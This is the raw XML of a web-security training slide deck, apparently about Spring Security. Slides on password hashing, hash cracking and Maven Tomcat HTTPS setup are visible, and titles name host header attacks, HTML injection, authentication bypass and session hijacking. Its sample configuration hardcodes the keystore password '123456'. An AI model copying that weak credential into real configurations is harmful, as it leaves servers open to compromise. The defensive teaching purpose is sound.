                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystorePass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;123456&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystorePass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     &lt;/configuration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;/plugin&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15640422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How to configure Maven Tomcat Plugin to use HTTPS (SSL/TLS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mvn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tomcat7:run-war</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30092117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hash functions used to implement data structures such as hash tables are designed to be fast, not secure. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cryptographic hash functions may be used to implement password hashing. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>functions like SHA256, SHA512, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RipeMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and WHIRLPOOL are cryptographic hash functions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12975518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Spring Integration Framework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Message, Channel and Adapter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Understood the different Component Integration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Understood the Event-Driven Architecture</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285875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Hashes are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cracked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dictionary and Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>credentials are sent in clear / easy to decode format</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="36666" t="52963" r="33333" b="29259"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="513085" y="2971800"/>
            <a:ext cx="6858000" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236027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514F291-B47C-48A1-B199-EBD0A7B4E780}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>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Pencils_02_2012</Template>
  <TotalTime>4194</TotalTime>
  <Words>3650</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>364</Paragraphs>
  <Slides>80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80</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="83" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Pencils_02_2012</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Goals</vt:lpstr>
      <vt:lpstr>Goals</vt:lpstr>
      <vt:lpstr>Goals</vt:lpstr>
      <vt:lpstr>Goals</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    User credentials are sent in clear / easy to decode format </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Host Header Attack</vt:lpstr>
      <vt:lpstr>Why HTTP host header needed ? </vt:lpstr>
      <vt:lpstr>Why HTTP host header needed ? </vt:lpstr>
      <vt:lpstr>Why HTTP host header needed ? </vt:lpstr>
      <vt:lpstr>Prevent Host Header Attack</vt:lpstr>
      <vt:lpstr>HTML Injection</vt:lpstr>
      <vt:lpstr>Types of HTML Injection </vt:lpstr>
      <vt:lpstr>Stored HTML Injection:</vt:lpstr>
      <vt:lpstr>Reflected HTML Injection: </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reflected HTML Injection:</vt:lpstr>
      <vt:lpstr>How to Prevent HTML Injection? </vt:lpstr>
      <vt:lpstr>Authentication Bypass</vt:lpstr>
      <vt:lpstr>Methods to bypass the authentication schema:</vt:lpstr>
      <vt:lpstr>Test Authorization Bypass</vt:lpstr>
      <vt:lpstr>Test Authorization Bypass</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Iframe Injection</vt:lpstr>
      <vt:lpstr>Iframe Injection</vt:lpstr>
      <vt:lpstr>IFrame Injection Mitigation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Spring Security</vt:lpstr>
      <vt:lpstr>Spring Security</vt:lpstr>
      <vt:lpstr> Spring Security Integration</vt:lpstr>
      <vt:lpstr> Spring Security Integration</vt:lpstr>
      <vt:lpstr>Advantages of Spring Security</vt:lpstr>
      <vt:lpstr>Spring Security Features</vt:lpstr>
      <vt:lpstr>Spring Security Features</vt:lpstr>
      <vt:lpstr>Spring Security Features</vt:lpstr>
      <vt:lpstr>Spring Security Features </vt:lpstr>
      <vt:lpstr>Spring Security Features </vt:lpstr>
      <vt:lpstr>Spring Security Features </vt:lpstr>
      <vt:lpstr>Spring Security Features </vt:lpstr>
      <vt:lpstr>Features added in Spring Security 5.0 </vt:lpstr>
      <vt:lpstr>Features added in Spring Security 5.0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Creating a Keystore File and Keystore Password for HTTPS Connections</vt:lpstr>
      <vt:lpstr>    Creating a Keystore File and Keystore Password for HTTPS Connections</vt:lpstr>
      <vt:lpstr>    How to Obtain a Signature for an SSL Certificate</vt:lpstr>
      <vt:lpstr>    How to configure Maven Tomcat Plugin to use HTTPS (SSL/TLS)</vt:lpstr>
      <vt:lpstr>    How to configure Maven Tomcat Plugin to use HTTPS (SSL/TLS)</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414</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-03-13T15:47:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-21T03:29:19Z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